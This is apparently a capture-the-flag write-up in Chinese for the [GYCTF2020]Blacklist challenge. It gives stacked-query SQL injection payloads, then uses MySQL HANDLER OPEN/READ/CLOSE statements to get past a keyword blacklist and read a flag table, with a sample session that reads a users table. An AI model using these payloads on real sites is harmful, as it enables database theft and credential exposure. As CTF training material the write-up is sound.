[GYCTF2020]Blacklist
payload:1'
payload:1';show databases;
payload:1';show tables;
payload: 1';select * from FlagHere;
这里过滤了很多敏感字符
payload: 1';
HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;
处理程序语句(HANDLER Statement)
HANDLER tbl_name OPEN [ [AS] alias]
HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
[ WHERE where_condition ] [LIMIT ... ]
该语句提供对表存储引擎接口的直接访问。它可用于表
该语句将打开一个表,使其可使用后续语句进行访问。此表对象不由其他会话共享,并且在会话调用或会话终止之前不会关闭。
HANDLER ... OPENHANDLER ... READHANDLER ... CLOSE
HANDLER tbl_name CLOSE
例:
mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| users |
| word1 |
+----------------+
2 rows in set (0.00 sec)
mysql> HANDLER users OPEN;
Query OK, 0 rows affected (0.39 sec)
mysql> HANDLER users READ FIRST;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Bob | 123456 |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> HANDLER users CLOSE;
Query OK, 0 rows affected (0.00 sec)